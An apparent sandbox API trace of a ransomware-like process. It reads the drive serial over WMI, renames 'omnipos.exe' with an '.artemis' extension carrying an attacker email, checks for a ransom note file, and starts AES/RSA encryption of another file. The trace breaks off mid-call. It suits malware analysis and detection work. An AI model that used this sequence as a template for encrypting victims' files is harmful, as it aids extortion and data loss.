WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6bcde64 | out: ppvObject=0x6bcde64*=0x0) returned 0x80004002 [0161.078] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6bcde14 | out: ppvObject=0x6bcde14*=0x0) returned 0x80004002 [0161.078] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bcde20 | out: ppvObject=0x6bcde20*=0x77c148) returned 0x0 [0161.078] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77c148, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6bcde28 | out: pCid=0x6bcde28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0161.078] WbemDefPath:IUnknown:Release (This=0x77c148) returned 0x3 [0161.078] CoGetContextToken (in: pToken=0x6bcde80 | out: pToken=0x6bcde80) returned 0x0 [0161.078] CoGetContextToken (in: pToken=0x6bce288 | out: pToken=0x6bce288) returned 0x0 [0161.078] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce318 | out: ppvObject=0x6bce318*=0x0) returned 0x80004002 [0161.078] WbemDefPath:IUnknown:Release (This=0x6738460) returned 0x2 [0161.078] WbemDefPath:IUnknown:Release (This=0x6738460) returned 0x1 [0161.078] CoGetContextToken (in: pToken=0x6bcec10 | out: pToken=0x6bcec10) returned 0x0 [0161.078] CoGetContextToken (in: pToken=0x6bceb70 | out: pToken=0x6bceb70) returned 0x0 [0161.079] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x6bcec40*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6bcec3c | out: ppvObject=0x6bcec3c*=0x6738460) returned 0x0 [0161.079] WbemDefPath:IUnknown:AddRef (This=0x6738460) returned 0x3 [0161.079] WbemDefPath:IUnknown:Release (This=0x6738460) returned 0x2 [0161.079] WbemDefPath:IWbemPath:SetText (This=0x6738460, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0161.079] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738460, puCount=0x6bcedc0 | out: puCount=0x6bcedc0*=0x2) returned 0x0 [0161.079] WbemDefPath:IWbemPath:GetText (in: This=0x6738460, lFlags=4, puBuffLength=0x6bcedbc*=0x0, pszText=0x0 | out: puBuffLength=0x6bcedbc*=0xf, pszText=0x0) returned 0x0 [0161.079] WbemDefPath:IWbemPath:GetText (in: This=0x6738460, lFlags=4, puBuffLength=0x6bcedbc*=0xf, pszText="00000000000000" | out: puBuffLength=0x6bcedbc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0161.079] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bcedc0 | out: ppv=0x6bcedc0*=0x72015c) returned 0x0 [0161.079] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6bcedb8 | out: pAptType=0x6bcedb8*=1) returned 0x0 [0161.079] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6bcedbc | out: ppvObject=0x6bcedbc*=0x0) returned 0x80004002 [0161.079] IUnknown:Release (This=0x72015c) returned 0x1 [0161.079] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bce9e0 | out: ppv=0x6bce9e0*=0x673ef60) returned 0x0 [0161.080] WbemLocator:IUnknown:QueryInterface (in: This=0x673ef60, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6bcebf8 | out: ppvObject=0x6bcebf8*=0x0) returned 0x80004002 [0161.080] WbemLocator:IClassFactory:CreateInstance (in: This=0x673ef60, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bcec0c | out: ppvObject=0x6bcec0c*=0x6736f38) returned 0x0 [0161.080] WbemLocator:IUnknown:Release (This=0x673ef60) returned 0x0 [0161.080] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f38, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce82c | out: ppvObject=0x6bce82c*=0x6736f38) returned 0x0 [0161.080] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f38, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6bce7e8 | out: ppvObject=0x6bce7e8*=0x0) returned 0x80004002 [0161.080] WbemLocator:IUnknown:AddRef (This=0x6736f38) returned 0x3 [0161.080] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f38, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6bce144 | out: ppvObject=0x6bce144*=0x0) returned 0x80004002 [0161.080] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f38, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6bce0f4 | out: ppvObject=0x6bce0f4*=0x0) returned 0x80004002 [0161.080] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f38, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce100 | out: ppvObject=0x6bce100*=0x0) returned 0x80004002 [0161.080] CoGetContextToken (in: pToken=0x6bce160 | out: pToken=0x6bce160) returned 0x0 [0161.080] CoGetContextToken (in: pToken=0x6bce568 | out: pToken=0x6bce568) returned 0x0 [0161.080] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f38, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce5f8 | out: ppvObject=0x6bce5f8*=0x0) returned 0x80004002 [0161.080] WbemLocator:IUnknown:Release (This=0x6736f38) returned 0x2 [0161.080] WbemLocator:IUnknown:Release (This=0x6736f38) returned 0x1 [0161.080] CoGetContextToken (in: pToken=0x6bcebd8 | out: pToken=0x6bcebd8) returned 0x0 [0161.080] CoGetContextToken (in: pToken=0x6bceb38 | out: pToken=0x6bceb38) returned 0x0 [0161.080] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f38, riid=0x6bcec08*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6bcec04 | out: ppvObject=0x6bcec04*=0x6736f38) returned 0x0 [0161.080] WbemLocator:IUnknown:AddRef (This=0x6736f38) returned 0x3 [0161.080] WbemLocator:IUnknown:Release (This=0x6736f38) returned 0x2 [0161.080] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738460, puCount=0x6bced9c | out: puCount=0x6bced9c*=0x2) returned 0x0 [0161.080] WbemDefPath:IWbemPath:GetText (in: This=0x6738460, lFlags=8, puBuffLength=0x6bced98*=0x0, pszText=0x0 | out: puBuffLength=0x6bced98*=0xf, pszText=0x0) returned 0x0 [0161.080] WbemDefPath:IWbemPath:GetText (in: This=0x6738460, lFlags=8, puBuffLength=0x6bced98*=0xf, pszText="00000000000000" | out: puBuffLength=0x6bced98*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0161.081] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6bcec74 | out: ppv=0x6bcec74*=0x6736f48) returned 0x0 [0161.081] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6736f48, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6bced08 | out: ppNamespace=0x6bced08*=0x6730cb4) returned 0x0 [0161.630] WbemLocator:IUnknown:QueryInterface (in: This=0x6730cb4, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bceba4 | out: ppvObject=0x6bceba4*=0x781904) returned 0x0 [0161.631] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781904, pProxy=0x6730cb4, pAuthnSvc=0x6bcebf4, pAuthzSvc=0x6bcebf0, pServerPrincName=0x6bcebe8, pAuthnLevel=0x6bcebec, pImpLevel=0x6bcebdc, pAuthInfo=0x6bcebe0, pCapabilites=0x6bcebe4 | out: pAuthnSvc=0x6bcebf4*=0xa, pAuthzSvc=0x6bcebf0*=0x0, pServerPrincName=0x6bcebe8, pAuthnLevel=0x6bcebec*=0x6, pImpLevel=0x6bcebdc*=0x2, pAuthInfo=0x6bcebe0, pCapabilites=0x6bcebe4*=0x1) returned 0x0 [0161.631] WbemLocator:IUnknown:Release (This=0x781904) returned 0x1 [0161.631] WbemLocator:IUnknown:QueryInterface (in: This=0x6730cb4, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bceb98 | out: ppvObject=0x6bceb98*=0x781924) returned 0x0 [0161.631] WbemLocator:IUnknown:QueryInterface (in: This=0x6730cb4, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bceb94 | out: ppvObject=0x6bceb94*=0x781904) returned 0x0 [0161.631] WbemLocator:IClientSecurity:SetBlanket (This=0x781904, pProxy=0x6730cb4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0161.631] WbemLocator:IUnknown:Release (This=0x781904) returned 0x2 [0161.631] WbemLocator:IUnknown:Release (This=0x781924) returned 0x1 [0161.631] CoTaskMemFree (pv=0x77e058) [0161.631] WbemLocator:IUnknown:Release (This=0x6736f48) returned 0x0 [0161.631] WbemLocator:IUnknown:QueryInterface (in: This=0x6730cb4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce794 | out: ppvObject=0x6bce794*=0x781924) returned 0x0 [0161.632] WbemLocator:IUnknown:QueryInterface (in: This=0x781924, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6bce750 | out: ppvObject=0x6bce750*=0x0) returned 0x80004002 [0161.632] WbemLocator:IUnknown:QueryInterface (in: This=0x781924, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6bce56c | out: ppvObject=0x6bce56c*=0x0) returned 0x80004002 [0161.632] WbemLocator:IUnknown:AddRef (This=0x781924) returned 0x3 [0161.632] WbemLocator:IUnknown:QueryInterface (in: This=0x781924, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6bce0ac | out: ppvObject=0x6bce0ac*=0x0) returned 0x80004002 [0161.633] WbemLocator:IUnknown:QueryInterface (in: This=0x781924, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6bce05c | out: ppvObject=0x6bce05c*=0x0) returned 0x80004002 [0161.633] WbemLocator:IUnknown:QueryInterface (in: This=0x781924, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce068 | out: ppvObject=0x6bce068*=0x781884) returned 0x0 [0161.633] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x781884, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6bce070 | out: pCid=0x6bce070*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0161.633] WbemLocator:IUnknown:Release (This=0x781884) returned 0x3 [0161.633] CoGetContextToken (in: pToken=0x6bce0c8 | out: pToken=0x6bce0c8) returned 0x0 [0161.633] CoGetContextToken (in: pToken=0x6bce4d0 | out: pToken=0x6bce4d0) returned 0x0 [0161.633] WbemLocator:IUnknown:QueryInterface (in: This=0x781924, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce560 | out: ppvObject=0x6bce560*=0x78190c) returned 0x0 [0161.633] WbemLocator:IRpcOptions:Query (in: This=0x78190c, pPrx=0x781924, dwProperty=2, pdwValue=0x6bce588 | out: pdwValue=0x6bce588) returned 0x80004002 [0161.633] WbemLocator:IUnknown:Release (This=0x78190c) returned 0x3 [0161.633] WbemLocator:IUnknown:Release (This=0x781924) returned 0x2 [0161.633] CoGetContextToken (in: pToken=0x6bceaa8 | out: pToken=0x6bceaa8) returned 0x0 [0161.633] CoGetContextToken (in: pToken=0x6bcea08 | out: pToken=0x6bcea08) returned 0x0 [0161.633] WbemLocator:IUnknown:QueryInterface (in: This=0x781924, riid=0x6bcead8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6bcead4 | out: ppvObject=0x6bcead4*=0x6730cb4) returned 0x0 [0161.633] WbemLocator:IUnknown:AddRef (This=0x6730cb4) returned 0x4 [0161.633] WbemLocator:IUnknown:Release (This=0x6730cb4) returned 0x3 [0161.633] WbemLocator:IUnknown:Release (This=0x6730cb4) returned 0x2 [0161.633] SysStringLen (param_1=0x0) returned 0x0 [0161.633] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738620, puCount=0x6bcee6c | out: puCount=0x6bcee6c*=0x0) returned 0x0 [0161.634] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=2, puBuffLength=0x6bcee68*=0x0, pszText=0x0 | out: puBuffLength=0x6bcee68*=0x20, pszText=0x0) returned 0x0 [0161.634] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=2, puBuffLength=0x6bcee68*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6bcee68*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0161.634] CoGetContextToken (in: pToken=0x6bcead8 | out: pToken=0x6bcead8) returned 0x0 [0161.634] WbemLocator:IUnknown:AddRef (This=0x781924) returned 0x3 [0161.634] WbemLocator:IUnknown:QueryInterface (in: This=0x781924, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce96c | out: ppvObject=0x6bce96c*=0x781924) returned 0x0 [0161.634] WbemLocator:IUnknown:Release (This=0x781924) returned 0x3 [0161.634] WbemLocator:IUnknown:Release (This=0x781924) returned 0x2 [0161.634] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=2, puBuffLength=0x6bcee70*=0x0, pszText=0x0 | out: puBuffLength=0x6bcee70*=0x20, pszText=0x0) returned 0x0 [0161.634] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=2, puBuffLength=0x6bcee70*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6bcee70*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0161.634] IWbemServices:GetObject (in: This=0x6730cb4, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6bcee24*=0x0, ppCallResult=0x0 | out: ppObject=0x6bcee24*=0x673afa0, ppCallResult=0x0) returned 0x0 [0166.467] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738460, puCount=0x6bcee24 | out: puCount=0x6bcee24*=0x2) returned 0x0 [0166.467] WbemDefPath:IWbemPath:GetText (in: This=0x6738460, lFlags=4, puBuffLength=0x6bcee20*=0x0, pszText=0x0 | out: puBuffLength=0x6bcee20*=0xf, pszText=0x0) returned 0x0 [0166.467] WbemDefPath:IWbemPath:GetText (in: This=0x6738460, lFlags=4, puBuffLength=0x6bcee20*=0xf, pszText="00000000000000" | out: puBuffLength=0x6bcee20*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0166.467] IWbemClassObject:Get (in: This=0x673afa0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6bcee20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x356e060*=0, plFlavor=0x356e064*=0 | out: pVal=0x6bcee20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x356e060*=8, plFlavor=0x356e064*=0) returned 0x0 [0166.467] SysStringByteLen (bstr="9C354B42") returned 0x10 [0166.467] SysStringByteLen (bstr="9C354B42") returned 0x10 [0166.467] IWbemClassObject:Get (in: This=0x673afa0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6bcee28*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x356e060*=8, plFlavor=0x356e064*=0 | out: pVal=0x6bcee28*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x356e060*=8, plFlavor=0x356e064*=0) returned 0x0 [0166.467] SysStringByteLen (bstr="9C354B42") returned 0x10 [0166.467] SysStringByteLen (bstr="9C354B42") returned 0x10 [0166.467] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\omnipos.exe", nBufferLength=0x105, lpBuffer=0x6bcea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\omnipos.exe", lpFilePart=0x0) returned 0x29 [0166.467] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\omnipos.exe.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x6bcea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\omnipos.exe.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x54 [0166.467] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcee88) returned 1 [0166.467] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\omnipos.exe" (normalized: "c:\\program files\\common files\\omnipos.exe"), fInfoLevelId=0x0, lpFileInformation=0x6bcef04 | out: lpFileInformation=0x6bcef04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a527150, ftCreationTime.dwHighDateTime=0x1d5949c, ftLastAccessTime.dwLowDateTime=0x8e158290, ftLastAccessTime.dwHighDateTime=0x1d56f0d, ftLastWriteTime.dwLowDateTime=0x8e158290, ftLastWriteTime.dwHighDateTime=0x1d56f0d, nFileSizeHigh=0x0, nFileSizeLow=0x13a00)) returned 1 [0166.468] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcee84) returned 1 [0166.468] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\omnipos.exe" (normalized: "c:\\program files\\common files\\omnipos.exe"), lpNewFileName="C:\\Program Files\\Common Files\\omnipos.exe.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\program files\\common files\\omnipos.exe.id-9c354b42.[khalate@tutanota.com].artemis")) returned 1 [0166.471] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\operamail.exe", nBufferLength=0x105, lpBuffer=0x6bceacc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\operamail.exe", lpFilePart=0x0) returned 0x2b [0166.471] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\operamail.exe", nBufferLength=0x105, lpBuffer=0x6bceac4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\operamail.exe", lpFilePart=0x0) returned 0x2b [0166.471] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6bceacc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\info-decrypt.hta", lpFilePart=0x0) returned 0x2e [0166.471] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcef2c) returned 1 [0166.471] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6bcefa8 | out: lpFileInformation=0x6bcefa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c9c3c0, ftCreationTime.dwHighDateTime=0x1d6a20b, ftLastAccessTime.dwLowDateTime=0x4c9c3c0, ftLastAccessTime.dwHighDateTime=0x1d6a20b, ftLastWriteTime.dwLowDateTime=0x4c9c3c0, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x1557)) returned 1 [0166.471] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcef28) returned 1 [0166.471] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\operamail.exe", nBufferLength=0x105, lpBuffer=0x6bcea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\operamail.exe", lpFilePart=0x0) returned 0x2b [0166.471] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bceef4) returned 1 [0166.471] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\operamail.exe" (normalized: "c:\\program files\\common files\\operamail.exe"), fInfoLevelId=0x0, lpFileInformation=0x356e5e8 | out: lpFileInformation=0x356e5e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcf5b140, ftCreationTime.dwHighDateTime=0x1d5c3fd, ftLastAccessTime.dwLowDateTime=0xa2abb830, ftLastAccessTime.dwHighDateTime=0x1d55efc, ftLastWriteTime.dwLowDateTime=0xa2abb830, ftLastWriteTime.dwHighDateTime=0x1d55efc, nFileSizeHigh=0x0, nFileSizeLow=0x13a00)) returned 1 [0166.471] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bceef0) returned 1 [0166.471] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\operamail.exe", nBufferLength=0x105, lpBuffer=0x6bce934, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\operamail.exe", lpFilePart=0x0) returned 0x2b [0166.471] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcee28) returned 1 [0166.471] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\operamail.exe" (normalized: "c:\\program files\\common files\\operamail.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x57c [0166.472] GetFileType (hFile=0x57c) returned 0x1 [0166.472] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcee24) returned 1 [0166.472] GetFileType (hFile=0x57c) returned 0x1 [0166.472] GetFileSize (in: hFile=0x57c, lpFileSizeHigh=0x6bcef30 | out: lpFileSizeHigh=0x6bcef30*=0x0) returned 0x13a00 [0166.472] ReadFile (in: hFile=0x57c, lpBuffer=0x356e790, nNumberOfBytesToRead=0x13a00, lpNumberOfBytesRead=0x6bceedc, lpOverlapped=0x0 | out: lpBuffer=0x356e790*, lpNumberOfBytesRead=0x6bceedc*=0x13a00, lpOverlapped=0x0) returned 1 [0166.473] CloseHandle (hObject=0x57c) returned 1 [0166.473] CryptAcquireContextW (in: phProv=0x6bcee7c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6bcee7c*=0x7a8870) returned 1 [0166.474] CryptGenRandom (in: hProv=0x7a8870, dwLen=0x10, pbBuffer=0x35824e4 | out: pbBuffer=0x35824e4) returned 1 [0167.091] CryptImportKey (in: hProv=0x7a8870, pbData=0x37ad1ec, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6bcee4c | out: phKey=0x6bcee4c*=0x77b3f0) returned 1 [0167.091] CryptContextAddRef (hProv=0x7a8870, pdwReserved=0x0, dwFlags=0x0) returned 1 [0167.091] CryptContextAddRef (hProv=0x7a8870, pdwReserved=0x0, dwFlags=0x0) returned 1 [0167.091] CryptDuplicateKey (in: hKey=0x77b3f0, pdwReserved=0x0, 